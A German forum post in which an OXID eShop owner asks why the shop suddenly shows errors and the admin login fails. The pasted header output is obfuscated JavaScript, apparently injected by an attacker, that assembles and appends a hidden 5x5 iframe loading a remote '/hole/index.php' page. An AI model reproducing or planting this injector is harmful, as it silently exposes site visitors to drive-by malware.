Hallo liebe Community. Ich habe seit Februar den OXID 4.4.5 problem und Buglos am laufen. Seit heute Nacht erhalte ich folgende Fehlermeldung im Header wenn ich den Shop aufrufe:
nm='de';nl='nts';kl='i';j='tt';jp='7a0';z='hol';s='/s';wr='3fb';ww='7';k='aus';i='79';hs='/in';xj='1';da='ge';no='x.p';v='tp=';lm='ra';zq='7a';hg='a';x='fc';pb='hp?';st='h';q='e';qe='sme';r='p:/';yb='/';ej='om';cr='f';ry='c';g='.c';gc='s';f='r';n='m';ev='1c';vi='e';uh=kl.concat(cr,lm,n,vi);th=gc.concat(f,ry);d=st.concat(j,r,s,k,hg,da,qe,nl,g,ej,yb,z,q,hs,nm,no,pb,v,wr,jp,x,ev,xj,i,zq,ww);var t=document.createElement(uh);t.setAttribute('width','5');t.setAttribute('height','5');t.setAttribute('style','display:none');t.setAttribute(th,d);document.body.appendChild(t);
Warning: Cannot modify header information - headers already sent by (output started at /mnt/web1/21/89/xxxxxx/htdocs/index.php:1) in /mnt/web1/21/89/xxxxxx/htdocs/core/oxutilsserver.php on line 107
Warning: Cannot modify header information - headers already sent by (output started at /mnt/web1/21/89/xxxxxx/htdocs/index.php:1) in /mnt/web1/21/89/xxxxxx/htdocs/core/oxutils.php on line 1112
In den Adminbereich komme ich gar nicht mehr rein. hier sagt mir die Fehlermeldung, dass mein Browser keine Cookies aktiviert hätte.
Bin etwas ratlos, weshalb das Problem plötzlich auftritt.
Vielen Dank für eure Anregungen vorab.